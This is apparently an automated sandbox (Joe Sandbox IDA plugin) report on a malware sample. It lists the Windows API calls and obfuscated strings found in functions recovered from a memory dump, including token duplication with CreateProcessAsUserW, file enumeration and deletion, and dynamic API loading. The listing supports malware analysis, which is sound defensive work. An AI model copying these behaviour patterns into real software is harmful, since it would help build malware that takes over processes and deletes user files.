GlobalMemoryStatusEx.KERNEL32(?), ref: 0040C1E2
GetSystemInfo.KERNEL32(?), ref: 0040C1F8
GetProcessHeap.KERNEL32(00000008,000000BD), ref: 0040C30F
HeapAlloc.KERNEL32(00000000), ref: 0040C312
GetDesktopWindow.USER32 ref: 0040C32E
RegOpenKeyW.ADVAPI32(80000002,00000000,?), ref: 0040C365
GetProcessHeap.KERNEL32(00000008,00000051), ref: 0040C3E0
HeapAlloc.KERNEL32(00000000), ref: 0040C3E7
GetClipboardViewer.USER32 ref: 0040C403
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 0040C448
GetProcessHeap.KERNEL32(00000008,00000015), ref: 0040C4A1
HeapAlloc.KERNEL32(00000000), ref: 0040C4A8
CountClipboardFormats.USER32 ref: 0040C4C0
StrStrIW.SHLWAPI(?,00000000), ref: 0040C4F8
Sleep.KERNEL32(00002710), ref: 0040C505
StrStrIW.SHLWAPI(?,00000000), ref: 0040C514
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040C51C
HeapFree.KERNEL32(00000000), ref: 0040C529
RegCloseKey.ADVAPI32(?), ref: 0040C536
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040C540
HeapFree.KERNEL32(00000000), ref: 0040C547
Sleep.KERNEL32(00002710), ref: 0040C56E
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040C59A
HeapFree.KERNEL32(00000000), ref: 0040C59D
GetProcessHeap.KERNEL32(00000000,?), ref: 0040C5A3
HeapFree.KERNEL32(00000000), ref: 0040C5A6
GetProcessHeap.KERNEL32(00000000,?), ref: 0040C5B2
HeapFree.KERNEL32(00000000), ref: 0040C5B5

Strings

c, xrefs: 0040C0B9
$iZ, xrefs: 0040C27D
p 3, xrefs: 0040C3B1
hps3, xrefs: 0040C3D1
jquR, xrefs: 0040C494
9c&p, xrefs: 0040C3A1
hZ, xrefs: 0040C2F6
)S#R, xrefs: 0040C14B
%i4i, xrefs: 0040C20D
Kc, xrefs: 0040C3D9
Wi, xrefs: 0040C308
"iZ, xrefs: 0040C21D
A, xrefs: 0040C49C
&A%$, xrefs: 0040C133
qBc2, xrefs: 0040C0F0
+Z2i, xrefs: 0040C293
4i5i, xrefs: 0040C2CA
@, xrefs: 0040C1CF
%i1i, xrefs: 0040C2A9
RA, xrefs: 0040C48D

Memory Dump Source

Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_484.jbxd

Function 0040A0EE, Relevance: 94.8, APIs: 36, Strings: 18, Instructions: 289

APIs

GetProcessHeap.KERNEL32(00000008,00000069,?,00000000,76E6FE8D), ref: 0040A1A4
HeapAlloc.KERNEL32(00000000), ref: 0040A1A7
ReleaseCapture.USER32 ref: 0040A1C2
ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000104), ref: 0040A1F5
GetShortPathNameW.KERNEL32(?,?,00000104), ref: 0040A206
GetProcessHeap.KERNEL32(00000008,0000003D), ref: 0040A258
HeapAlloc.KERNEL32(00000000), ref: 0040A25B
GetForegroundWindow.USER32 ref: 0040A272
wsprintfW.USER32 ref: 0040A2A6
GetProcessHeap.KERNEL32(00000008,00000019), ref: 0040A2E6
HeapAlloc.KERNEL32(00000000), ref: 0040A2E9
RevertToSelf.ADVAPI32 ref: 0040A300
CoInitializeEx.OLE32(00000000,00000006), ref: 0040A362
GetProcessHeap.KERNEL32(00000008,0000000D), ref: 0040A392
HeapAlloc.KERNEL32(00000000), ref: 0040A395
GetCapture.USER32 ref: 0040A3AC
GetProcessHeap.KERNEL32(00000008,00000011), ref: 0040A40B
HeapAlloc.KERNEL32(00000000), ref: 0040A40E
GetDoubleClickTime.USER32 ref: 0040A422
LoadLibraryA.KERNEL32(57495761), ref: 0040A44C
GetProcAddress.KERNEL32(00000000), ref: 0040A453
GetLastError.KERNEL32 ref: 0040A45D
Sleep.KERNEL32(00000064), ref: 0040A46C
GetForegroundWindow.USER32 ref: 0040A472
CoUninitialize.OLE32 ref: 0040A48B
CloseHandle.KERNEL32(?), ref: 0040A494
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040A4A3
HeapFree.KERNEL32(00000000), ref: 0040A4AC
GetProcessHeap.KERNEL32(00000000,57495761), ref: 0040A4B2
HeapFree.KERNEL32(00000000), ref: 0040A4B5
GetProcessHeap.KERNEL32(00000000,4E5A666B), ref: 0040A4BB
HeapFree.KERNEL32(00000000), ref: 0040A4BE
GetProcessHeap.KERNEL32(00000000,31653832), ref: 0040A4C4
HeapFree.KERNEL32(00000000), ref: 0040A4C7
GetProcessHeap.KERNEL32(00000000,?), ref: 0040A4CD
HeapFree.KERNEL32(00000000), ref: 0040A4D0

Strings

KfuN, xrefs: 0040A216
"V., xrefs: 0040A3DE
q, xrefs: 0040A3FC
.N(k, xrefs: 0040A22B
!<, xrefs: 0040A3EC
@, xrefs: 0040A358
kfZNI, xrefs: 0040A288
aWIWz, xrefs: 0040A316
deBs, xrefs: 0040A14A
*kFZ, xrefs: 0040A21D
I, xrefs: 0040A407
Us[8, xrefs: 0040A132
y{[W, xrefs: 0040A379
<, xrefs: 0040A32B
Y$i, xrefs: 0040A380
V8K1, xrefs: 0040A184
28e1s, xrefs: 0040A1D8
qb3B, xrefs: 0040A400

Memory Dump Source

Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_484.jbxd

Function 0040DDBF, Relevance: 80.8, APIs: 42, Strings: 4, Instructions: 256

APIs

Part of subcall function 0040D97F: ExpandEnvironmentStringsW.KERNEL32(001CFDA8,00000000,00000000,001CFDA8,001CFDA8,001CFDA8,001CFDA8,?,0040DA06,00412000,7142434B,001CFDA8,?,00401ADF,?), ref: 0040D991
Part of subcall function 0040D97F: GetProcessHeap.KERNEL32(00000008,00000000,?,0040DA06,00412000,7142434B,001CFDA8,?,00401ADF,?,?,?,?,?,?,KCBqiNhR7x), ref: 0040D9AB
Part of subcall function 0040D97F: HeapAlloc.KERNEL32(00000000,?,0040DA06,00412000,7142434B,001CFDA8,?,00401ADF,?,?,?,?,?,?,KCBqiNhR7x,0040F467), ref: 0040D9B2
Part of subcall function 0040D97F: ExpandEnvironmentStringsW.KERNEL32(001CFDA8,00000000,7142434B,00000000,?,0040DA06,00412000,7142434B,001CFDA8,?,00401ADF,?), ref: 0040D9CD
Part of subcall function 0040D97F: GetProcessHeap.KERNEL32(00000000,00000000,0040DA06,00412000,7142434B,001CFDA8,?,00401ADF,?,?,?,?,?,?,KCBqiNhR7x,0040F467), ref: 0040D9DA
Part of subcall function 0040D97F: HeapFree.KERNEL32(00000000,?,00401ADF), ref: 0040D9E1

lstrlenW.KERNEL32(?,00000001,00000000,?), ref: 0040DDE5
GetProcessHeap.KERNEL32(00000008,00000208), ref: 0040DDFA
HeapAlloc.KERNEL32(00000000), ref: 0040DDFD
GetProcessHeap.KERNEL32(00000008,?), ref: 0040DE20
HeapAlloc.KERNEL32(00000000), ref: 0040DE23
GetProcessHeap.KERNEL32(00000008,00000250), ref: 0040DE3A
HeapAlloc.KERNEL32(00000000), ref: 0040DE3D
lstrcpyW.KERNEL32(?,00000001), ref: 0040DE55
GetProcessHeap.KERNEL32(00000008,00000009), ref: 0040DE70
HeapAlloc.KERNEL32(00000000), ref: 0040DE73
GetProcessWindowStation.USER32 ref: 0040DE87
lstrcatW.KERNEL32(?,00000000), ref: 0040DEB8
lstrcpyW.KERNEL32(00402247,00000001), ref: 0040DEC4
GetProcessHeap.KERNEL32(00000008,00000015), ref: 0040DEF5
HeapAlloc.KERNEL32(00000000), ref: 0040DEF8
GetOpenClipboardWindow.USER32 ref: 0040DF0C
lstrcatW.KERNEL32(00402247,00000000), ref: 0040DF3D
FindFirstFileW.KERNEL32(00402247,?), ref: 0040DF47
lstrlenW.KERNEL32(79146553), ref: 0040DF7F
lstrcatW.KERNEL32(314C5341,79146553), ref: 0040DFED
GetLastError.KERNEL32 ref: 0040E051

Part of subcall function 0040DDBF: GetProcessHeap.KERNEL32(00000000,314C5341), ref: 0040DF9A
Part of subcall function 0040DDBF: HeapFree.KERNEL32(00000000), ref: 0040DF9D
Part of subcall function 0040DDBF: GetProcessHeap.KERNEL32(00000008,00000000), ref: 0040DFAC
Part of subcall function 0040DDBF: HeapAlloc.KERNEL32(00000000), ref: 0040DFAF
Part of subcall function 0040DDBF: lstrcpyW.KERNEL32(00000000,313F5356), ref: 0040DFCA
Part of subcall function 0040DDBF: lstrcatW.KERNEL32(314C5341,?), ref: 0040DFD4
Part of subcall function 0040DDBF: RemoveDirectoryW.KERNEL32(314C5341), ref: 0040E014

DeleteFileW.KERNEL32(314C5341), ref: 0040E01F
FindNextFileW.KERNEL32(sb0aVS,?), ref: 0040E035
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040E05D
HeapFree.KERNEL32(00000000), ref: 0040E066
GetProcessHeap.KERNEL32(00000000,?), ref: 0040E06B
HeapFree.KERNEL32(00000000), ref: 0040E06E
GetProcessHeap.KERNEL32(00000000,77043129), ref: 0040E075
HeapFree.KERNEL32(00000000), ref: 0040E078
GetProcessHeap.KERNEL32(00000000,00402247), ref: 0040E082
HeapFree.KERNEL32(00000000), ref: 0040E085
GetProcessHeap.KERNEL32(00000000,?), ref: 0040E091
HeapFree.KERNEL32(00000000), ref: 0040E094
GetProcessHeap.KERNEL32(00000000,?), ref: 0040E0A0
HeapFree.KERNEL32(00000000), ref: 0040E0A3

Strings

bf>, xrefs: 0040DF12
0a, xrefs: 0040DEE2
sb0aVS, xrefs: 0040E032
xSYb, xrefs: 0040DEDB

Memory Dump Source

Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_484.jbxd

Function 004064D2, Relevance: 65.0, APIs: 29, Strings: 8, Instructions: 258

APIs

OpenProcess.KERNEL32(02000000,00000000), ref: 00406529
ProcessIdToSessionId.KERNEL32(?,?), ref: 00406541
OpenProcessToken.ADVAPI32(00000000,000201EB,?,?,?), ref: 0040655F

Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000008,00000018), ref: 00404EA7
Part of subcall function 00404E4E: HeapAlloc.KERNEL32(00000000), ref: 00404EAA
Part of subcall function 00404E4E: GetLastError.KERNEL32 ref: 00404EC8
Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000008,0000001F), ref: 00404F61
Part of subcall function 00404E4E: HeapAlloc.KERNEL32(00000000), ref: 00404F64
Part of subcall function 00404E4E: GetTickCount.KERNEL32 ref: 00404F7E
Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000008,00000017), ref: 00404FF4
Part of subcall function 00404E4E: HeapAlloc.KERNEL32(00000000), ref: 00404FF7
Part of subcall function 00404E4E: GetLogicalDrives.KERNEL32 ref: 00405011
Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000008,0000001A), ref: 00405099
Part of subcall function 00404E4E: HeapAlloc.KERNEL32(00000000), ref: 0040509C
Part of subcall function 00404E4E: GetTickCount.KERNEL32 ref: 004050B6
Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000008,0000001D), ref: 0040513F
Part of subcall function 00404E4E: HeapAlloc.KERNEL32(00000000), ref: 00405142
Part of subcall function 00404E4E: GetMessageExtraInfo.USER32 ref: 0040515C
Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000008,0000001B), ref: 004051E4
Part of subcall function 00404E4E: HeapAlloc.KERNEL32(00000000), ref: 004051E7
Part of subcall function 00404E4E: GetCapture.USER32 ref: 00405201
Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000008,00000010), ref: 0040526F
Part of subcall function 00404E4E: HeapAlloc.KERNEL32(00000000), ref: 00405272
Part of subcall function 00404E4E: GetLogicalDrives.KERNEL32 ref: 0040528C
Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000008,00000015), ref: 004052FE
Part of subcall function 00404E4E: HeapAlloc.KERNEL32(00000000), ref: 00405301
Part of subcall function 00404E4E: GetMessagePos.USER32 ref: 0040531B
Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000008,0000001A), ref: 00405398
Part of subcall function 00404E4E: HeapAlloc.KERNEL32(00000000), ref: 0040539B
Part of subcall function 00404E4E: GetTickCount.KERNEL32 ref: 004053B5
Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000008,00000017), ref: 0040542D
Part of subcall function 00404E4E: HeapAlloc.KERNEL32(00000000), ref: 00405430
Part of subcall function 00404E4E: GetOpenClipboardWindow.USER32 ref: 0040544A
Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000008,0000001A), ref: 004054C5
Part of subcall function 00404E4E: HeapAlloc.KERNEL32(00000000), ref: 004054C8
Part of subcall function 00404E4E: DestroyCaret.USER32 ref: 004054E2
Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000008,00000017), ref: 00405563
Part of subcall function 00404E4E: HeapAlloc.KERNEL32(00000000), ref: 00405566
Part of subcall function 00404E4E: GetCursor.USER32 ref: 00405580
Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000008,00000021), ref: 00405611
Part of subcall function 00404E4E: HeapAlloc.KERNEL32(00000000), ref: 00405614
Part of subcall function 00404E4E: GetInputState.USER32 ref: 0040562E
Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000008,00000021), ref: 004056B2
Part of subcall function 00404E4E: HeapAlloc.KERNEL32(00000000), ref: 004056B5
Part of subcall function 00404E4E: GetMessageExtraInfo.USER32 ref: 004056CC
Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000008,0000001B), ref: 00405758
Part of subcall function 00404E4E: HeapAlloc.KERNEL32(00000000), ref: 0040575B
Part of subcall function 00404E4E: IsSystemResumeAutomatic.KERNEL32 ref: 00405775
Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000008,0000001C), ref: 004057F0
Part of subcall function 00404E4E: HeapAlloc.KERNEL32(00000000), ref: 004057F3
Part of subcall function 00404E4E: CountClipboardFormats.USER32 ref: 0040580D
Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000008,00000013), ref: 00405879
Part of subcall function 00404E4E: HeapAlloc.KERNEL32(00000000), ref: 0040587C
Part of subcall function 00404E4E: GetCurrentProcessId.KERNEL32 ref: 00405893
Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000008,00000014), ref: 00405906
Part of subcall function 00404E4E: HeapAlloc.KERNEL32(00000000), ref: 00405909
Part of subcall function 00404E4E: GetDesktopWindow.USER32 ref: 00405923
Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000008,00000015), ref: 004059A5
Part of subcall function 00404E4E: HeapAlloc.KERNEL32(00000000), ref: 004059A8
Part of subcall function 00404E4E: GetMenuCheckMarkDimensions.USER32 ref: 004059C2
Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000008,00000012), ref: 00405A39
Part of subcall function 00404E4E: HeapAlloc.KERNEL32(00000000), ref: 00405A3C
Part of subcall function 00404E4E: GetLogicalDrives.KERNEL32 ref: 00405A56
Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000008,00000012), ref: 00405AC5
Part of subcall function 00404E4E: HeapAlloc.KERNEL32(00000000), ref: 00405AC8
Part of subcall function 00404E4E: GetLogicalDrives.KERNEL32 ref: 00405AE2
Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000008,0000001E), ref: 00405B66
Part of subcall function 00404E4E: HeapAlloc.KERNEL32(00000000), ref: 00405B69
Part of subcall function 00404E4E: GetLogicalDrives.KERNEL32 ref: 00405B83
Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000008,00000019), ref: 00405BFC
Part of subcall function 00404E4E: HeapAlloc.KERNEL32(00000000), ref: 00405BFF
Part of subcall function 00404E4E: GetFocus.USER32 ref: 00405C19
Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000008,0000001B), ref: 00405C93
Part of subcall function 00404E4E: HeapAlloc.KERNEL32(00000000), ref: 00405C96
Part of subcall function 00404E4E: GetProcessHeap.KERNEL32 ref: 00405CAE
Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000008,00000013), ref: 00405D19
Part of subcall function 00404E4E: HeapAlloc.KERNEL32(00000000), ref: 00405D1C
Part of subcall function 00404E4E: GetDoubleClickTime.USER32 ref: 00405D36
Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000008,00000016), ref: 00405DA1
Part of subcall function 00404E4E: HeapAlloc.KERNEL32(00000000), ref: 00405DA4
Part of subcall function 00404E4E: CountClipboardFormats.USER32 ref: 00405DBB
Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000008,0000001D), ref: 00405E30
Part of subcall function 00404E4E: HeapAlloc.KERNEL32(00000000), ref: 00405E33
Part of subcall function 00404E4E: GetCaretBlinkTime.USER32 ref: 00405E4A
Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000008,00000019), ref: 00405EC0
Part of subcall function 00404E4E: HeapAlloc.KERNEL32(00000000), ref: 00405EC3
Part of subcall function 00404E4E: DestroyCaret.USER32 ref: 00405EDA
Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000008,00000018), ref: 00405F50
Part of subcall function 00404E4E: HeapAlloc.KERNEL32(00000000), ref: 00405F53
Part of subcall function 00404E4E: GetClipboardViewer.USER32 ref: 00405F6D
Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000008,00000019), ref: 00405FE4
Part of subcall function 00404E4E: HeapAlloc.KERNEL32(00000000), ref: 00405FE7
Part of subcall function 00404E4E: CloseClipboard.USER32 ref: 00405FFE
Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000008,00000021), ref: 00406083
Part of subcall function 00404E4E: HeapAlloc.KERNEL32(00000000), ref: 00406086
Part of subcall function 00404E4E: GetLastError.KERNEL32 ref: 0040609D
Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000008,00000014), ref: 0040610F
Part of subcall function 00404E4E: HeapAlloc.KERNEL32(00000000), ref: 00406112
Part of subcall function 00404E4E: GetTickCount.KERNEL32 ref: 00406129
Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000008,0000001F), ref: 004061AB
Part of subcall function 00404E4E: HeapAlloc.KERNEL32(00000000), ref: 004061AE
Part of subcall function 00404E4E: GetProcessHeap.KERNEL32 ref: 004061C6
Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000008,00000015), ref: 0040622E
Part of subcall function 00404E4E: HeapAlloc.KERNEL32(00000000), ref: 00406231
Part of subcall function 00404E4E: GetClipboardSequenceNumber.USER32 ref: 00406248
Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000008,0000001F), ref: 004062D1
Part of subcall function 00404E4E: HeapAlloc.KERNEL32(00000000), ref: 004062D4
Part of subcall function 00404E4E: GetCaretBlinkTime.USER32 ref: 004062E8
Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00406320
Part of subcall function 00404E4E: HeapFree.KERNEL32(00000000), ref: 00406329
Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000000,dFim7), ref: 00406331
Part of subcall function 00404E4E: HeapFree.KERNEL32(00000000), ref: 00406334
Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000000,tE0QRzR1xx3vniVk1VKKSNboiOMO5bcEV1I6GBiwPomHXkXxyn0wDEGzdhQff8tsmxSygyxpZPGmv9ZHfdFim7), ref: 0040633E
Part of subcall function 00404E4E: HeapFree.KERNEL32(00000000), ref: 00406341
Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000000,47505A70), ref: 00406348
Part of subcall function 00404E4E: HeapFree.KERNEL32(00000000), ref: 0040634B
Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000000,79677953), ref: 00406352
Part of subcall function 00404E4E: HeapFree.KERNEL32(00000000), ref: 00406355
Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000000,6D737438), ref: 0040635C
Part of subcall function 00404E4E: HeapFree.KERNEL32(00000000), ref: 0040635F
Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000000,5370665A), ref: 00406369
Part of subcall function 00404E4E: HeapFree.KERNEL32(00000000), ref: 0040636C
Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000000,47454477), ref: 00406373
Part of subcall function 00404E4E: HeapFree.KERNEL32(00000000), ref: 00406376
Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000000,6E797858), ref: 0040637D
Part of subcall function 00404E4E: HeapFree.KERNEL32(00000000), ref: 00406380
Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000000,58486D6F), ref: 00406387
Part of subcall function 00404E4E: HeapFree.KERNEL32(00000000), ref: 0040638A
Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000000,77694247), ref: 00406394
Part of subcall function 00404E4E: HeapFree.KERNEL32(00000000), ref: 00406397
Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000000,667A726A), ref: 004063A1
Part of subcall function 00404E4E: HeapFree.KERNEL32(00000000), ref: 004063A4
Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000000,6A327676), ref: 004063AE
Part of subcall function 00404E4E: HeapFree.KERNEL32(00000000), ref: 004063B1
Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000000,7945594C), ref: 004063BB
Part of subcall function 00404E4E: HeapFree.KERNEL32(00000000), ref: 004063BE
Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000000,53335655), ref: 004063C8
Part of subcall function 00404E4E: HeapFree.KERNEL32(00000000), ref: 004063CB
Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000000,56696E76), ref: 004063D5
Part of subcall function 00404E4E: HeapFree.KERNEL32(00000000), ref: 004063D8
Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000000,78783152), ref: 004063E2
Part of subcall function 00404E4E: HeapFree.KERNEL32(00000000), ref: 004063E5
Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000000,4B4B5631), ref: 004063EF
Part of subcall function 00404E4E: HeapFree.KERNEL32(00000000), ref: 004063F2
Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000000,485A3976), ref: 004063F9
Part of subcall function 00404E4E: HeapFree.KERNEL32(00000000), ref: 004063FC
Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000000,47377263), ref: 00406406
Part of subcall function 00404E4E: HeapFree.KERNEL32(00000000), ref: 00406409
Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000000,356A7738), ref: 00406413
Part of subcall function 00404E4E: HeapFree.KERNEL32(00000000), ref: 00406416
Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000000,66516864), ref: 0040641D
Part of subcall function 00404E4E: HeapFree.KERNEL32(00000000), ref: 00406420
Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000000,31366B4A), ref: 0040642A
Part of subcall function 00404E4E: HeapFree.KERNEL32(00000000), ref: 0040642D
Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000000,49315645), ref: 00406437
Part of subcall function 00404E4E: HeapFree.KERNEL32(00000000), ref: 0040643A
Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000000,52554D49), ref: 00406444
Part of subcall function 00404E4E: HeapFree.KERNEL32(00000000), ref: 00406447
Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000000,37783247), ref: 00406451
Part of subcall function 00404E4E: HeapFree.KERNEL32(00000000), ref: 00406454
Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000000,73734533), ref: 0040645E
Part of subcall function 00404E4E: HeapFree.KERNEL32(00000000), ref: 00406461
Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000000,5A544772), ref: 0040646B
Part of subcall function 00404E4E: HeapFree.KERNEL32(00000000), ref: 0040646E
Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000000,344A4B51), ref: 00406478
Part of subcall function 00404E4E: HeapFree.KERNEL32(00000000), ref: 0040647B
Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000000,48376271), ref: 00406485
Part of subcall function 00404E4E: HeapFree.KERNEL32(00000000), ref: 00406488
Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000000,4A464336), ref: 00406492
Part of subcall function 00404E4E: HeapFree.KERNEL32(00000000), ref: 00406495
Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000000,62354F4D), ref: 0040649F
Part of subcall function 00404E4E: HeapFree.KERNEL32(00000000), ref: 004064A2
Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000000,696F624E), ref: 004064AC
Part of subcall function 00404E4E: HeapFree.KERNEL32(00000000), ref: 004064AF
Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000000,34367575), ref: 004064B9
Part of subcall function 00404E4E: HeapFree.KERNEL32(00000000), ref: 004064BC
Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000000,?), ref: 004064C6
Part of subcall function 00404E4E: HeapFree.KERNEL32(00000000), ref: 004064C9

DuplicateTokenEx.ADVAPI32(?,02000000,00000000,00000001,00000001,?,?,?), ref: 00406586
SetTokenInformation.ADVAPI32(?,0000000C,?,00000004,?,?), ref: 004065A6
AllocateAndInitializeSid.ADVAPI32(?,00000001,00004000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 004065C0
GetLengthSid.ADVAPI32(?,?,?), ref: 004065D8
SetTokenInformation.ADVAPI32(?,00000019,?,-00000008,?,?), ref: 004065EB
FreeSid.ADVAPI32(?,?,?), ref: 004065F0
SetTokenInformation.ADVAPI32(?,0000001B,00000000,00000004,?,?), ref: 00406604
CreateEnvironmentBlock.USERENV(?,?,00000001,?,?), ref: 0040660F
GetProcessHeap.KERNEL32(00000008,00000041,?,?), ref: 00406679
HeapAlloc.KERNEL32(00000000,?,?), ref: 00406680
GetCaretBlinkTime.USER32 ref: 0040669C
GetProcessHeap.KERNEL32(00000008,00000031,?,?), ref: 004066FF
HeapAlloc.KERNEL32(00000000,?,?), ref: 00406706
CreatePopupMenu.USER32 ref: 0040671A
CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?,?,?), ref: 00406777
OpenProcessToken.ADVAPI32(00000000,000201EB,?,?,?), ref: 00406793
CloseHandle.KERNEL32(?), ref: 004067A8
CloseHandle.KERNEL32(00007479), ref: 004067B0
DestroyEnvironmentBlock.USERENV(00000000,?,?), ref: 004067BB
CloseHandle.KERNEL32(?), ref: 004067C4
GetProcessHeap.KERNEL32(00000000,00000000,?,?), ref: 004067C9
HeapFree.KERNEL32(00000000,?,?), ref: 004067D6
GetProcessHeap.KERNEL32(00000000,?,?,?), ref: 004067DB
HeapFree.KERNEL32(00000000,?,?), ref: 004067E2
CloseHandle.KERNEL32(?), ref: 004067ED
CloseHandle.KERNEL32(00000000), ref: 004067F0

Strings

Hj2ey1, xrefs: 004066B2
xjne, xrefs: 00406649
D, xrefs: 0040662A
=j^e, xrefs: 0040665E
1Hj, xrefs: 00406665
?j[e, xrefs: 00406634
57@m, xrefs: 004066DD
, xrefs: 004065CE

Memory Dump Source

Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_484.jbxd

Function 0040BB40, Relevance: 45.8, APIs: 24, Strings: 2, Instructions: 261

APIs

GetProcessHeap.KERNEL32(00000008,00000250,?,7142434B,0041CD20), ref: 0040BB67
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,0040BF42,?,0041CD20,0041CD24), ref: 0040BB70
GetProcessHeap.KERNEL32(00000008,00000208,?,?,?,?,?,?,?,?,?,?,?,0040BF42,?,0041CD20), ref: 0040BB86
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,0040BF42,?,0041CD20,0041CD24), ref: 0040BB89
GetProcessHeap.KERNEL32(00000008,00000208,?,?,?,?,?,?,?,?,?,?,?,0040BF42,?,0041CD20), ref: 0040BB9D
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,0040BF42,?,0041CD20,0041CD24), ref: 0040BBA0
GetProcessHeap.KERNEL32(00000008,0000001D), ref: 0040BBE4
HeapAlloc.KERNEL32(00000000), ref: 0040BBE7
ReleaseCapture.USER32 ref: 0040BBF9
GetSystemDirectoryW.KERNEL32(0041CD24,00000103), ref: 0040BC4D
FindClose.KERNEL32(?), ref: 0040BDC4

Part of subcall function 0040F5D9: GetProcessHeap.KERNEL32(00000008,0000000B,?,7142434B,0041CD20), ref: 0040F60E
Part of subcall function 0040F5D9: HeapAlloc.KERNEL32(00000000), ref: 0040F611
Part of subcall function 0040F5D9: GetShellWindow.USER32 ref: 0040F62D
Part of subcall function 0040F5D9: GetProcessHeap.KERNEL32(00000008,0000000B), ref: 0040F678
Part of subcall function 0040F5D9: HeapAlloc.KERNEL32(00000000), ref: 0040F67B
Part of subcall function 0040F5D9: GetLogicalDrives.KERNEL32 ref: 0040F68F
Part of subcall function 0040F5D9: GetModuleHandleA.KERNEL32(0040BF20,00000000), ref: 0040F6B9
Part of subcall function 0040F5D9: GetProcAddress.KERNEL32(00000000), ref: 0040F6C0
